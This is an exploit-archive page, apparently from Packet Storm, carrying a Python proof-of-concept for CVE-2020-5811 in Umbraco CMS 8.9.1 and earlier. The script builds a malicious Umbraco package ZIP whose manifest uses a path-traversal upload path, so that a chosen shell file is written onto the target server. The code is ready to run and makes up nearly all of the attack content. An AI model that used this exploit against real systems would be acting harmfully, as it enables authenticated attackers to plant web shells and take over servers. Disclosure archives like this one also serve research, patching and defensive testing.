Umbraco CMS 8.9.1 Traversal / Arbitrary File Write

Umbraco CMS 8.9.1 Traversal / Arbitrary File Write: Posted Aug 31, 2021; Authored by BitTheByte; Umbraco CMS versions 8.9.1 and below suffer from path traversal and arbitrary file write vulnerabilities.; tags | exploit, arbitrary, vulnerability, file inclusion; advisories | CVE-2020-5811; SHA-256 | 285a3167b58ee1d23f3b7b489f51a13fbc7670d634c6d025df3c15ebcfbdb31c; Download | Favorite | View

Umbraco CMS 8.9.1 Traversal / Arbitrary File Write

# Exploit Title: Umbraco CMS 8.9.1 - Path traversal and Arbitrary File Write (Authenticated)
# Exploit Author: BitTheByte
# Description: Authenticated path traversal vulnerability.
# Exploit Research: https://www.tenable.com/security/research/tra-2020-59
# Vendor Homepage: https://umbraco.com/
# Version: <= 8.9.1 
# CVE : CVE-2020-5811

import string
import random
import argparse
import zipfile
import os

package_xml = f"""<?xml version="1.0" encoding="utf-8"?>
<umbPackage>
  <files>
    <file>
      <guid>{{filename}}</guid>
      <orgPath>{{upload_path}}</orgPath>
      <orgName>{{filename}}</orgName>
    </file>
  </files>
  <info>
    <package>
      <name>PoC-{''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))}</name>
      <version>1.0.0</version>
      <iconUrl></iconUrl>
      <license url="http://opensource.org/licenses/MIT">MIT License</license>
      <url>https://example.com</url>
      <requirements>
        <major>0</major>
        <minor>0</minor>
        <patch>0</patch>
      </requirements>
    </package>
    <author>
      <name>CVE-2020-5811</name>
      <website>https://example.com</website>
    </author>
    <contributors>
      <contributor></contributor>
    </contributors>
    <readme><![CDATA[]]></readme>
  </info>
  <DocumentTypes />
  <Templates />
  <Stylesheets />
  <Macros />
  <DictionaryItems />
  <Languages />
  <DataTypes />
  <Actions />
</umbPackage>
"""

parser = argparse.ArgumentParser(description='CVE-2020-5811')
parser.add_argument('--shell', type=str, help='Shell file to upload', required=True)
parser.add_argument('--upload-path', type=str, help='Shell file update path on target server (default=~/../scripts)', default='~/../scripts')
args = parser.parse_args()

if not os.path.isfile(args.shell):
  print("[ERROR] please use a correct path for the shell file.")

output_file = "exploit.zip"

package = zipfile.ZipFile(output_file, 'w')  
package.writestr('package.xml', package_xml.format(filename=os.path.basename(args.shell), upload_path=args.upload_path))
package.writestr(os.path.basename(args.shell), open(args.shell, 'r').read())
package.close()

print(f"[DONE] Created Umbraco package: {output_file}")

Top Authors In Last 30 Days

Red Hat 221 files
Ubuntu 59 files
Debian 30 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,298)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,550)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,453)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Umbraco CMS 8.9.1 Traversal / Arbitrary File Write

Umbraco CMS 8.9.1 Traversal / Arbitrary File Write

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Umbraco CMS 8.9.1 Traversal / Arbitrary File Write

Share This

Umbraco CMS 8.9.1 Traversal / Arbitrary File Write

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems